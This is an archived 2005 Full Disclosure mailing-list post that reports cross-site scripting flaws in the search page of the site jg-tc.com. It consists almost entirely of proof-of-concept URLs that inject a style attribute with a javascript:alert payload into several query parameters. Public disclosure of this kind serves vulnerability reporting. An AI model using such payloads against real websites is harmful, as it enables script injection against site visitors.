Full Disclosure mailing list archives

XSS www.jg-tc.com


From: Jeff Peadro <jeff.peadro () gmail com>
Date: Sun, 14 Aug 2005 00:27:10 -0500

###########################-XSS-###############################

http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=XSS%22%20style=%22background:url(javascript:alert('XSS'))&s=recent&r=&d1=yesterday&d2=today&q=

http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=XSS%22%20style=%22background:url(javascript:alert('XSS'))&s=recent&r=&q=

http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=20&s=XSS%22%20style=%22background:url(javascript:alert('XSS'))&r=&d1=yesterday&d2=today&q=

http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=20&s=XSS%22%20style=%22background:url(javascript:alert('XSS'))&r=&q=

http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=20&s=recent&r=XSS%22%20style=%22background:url(javascript:alert('XSS'))&d1=yesterday&d2=today&q=

http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=20&s=recent&r=XSS%22%20style=%22background:url(javascript:alert('XSS'))&q=

http://jg-tc.com/shared-content/search/index.php?search=date&o=0&l=XSS%22%20style=%22background:url(javascript:alert('XSS'))&s=recent&d1=yesterday&d2=today

http://jg-tc.com/shared-content/search/index.php?search=date&o=0&l=20&s=XSS%22%20style=%22background:url(javascript:alert('XSS'))&d1=yesterday&d2=today

http://jg-tc.com/shared-content/search/index.php?search=date&o=0&l=20&s=recent&d1=XSS%22%20style=%22background:url(javascript:alert('XSS'))&d2=today

http://jg-tc.com/shared-content/search/index.php?search=date&o=0&l=20&s=recent&d1=yesterday&d2=XSS%22%20style=%22background:url(javascript:alert('XSS'))

Discovered by Jeff Peadro jeff.peadro [at] gmail . com
###########################-XSS-###############################
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Current thread: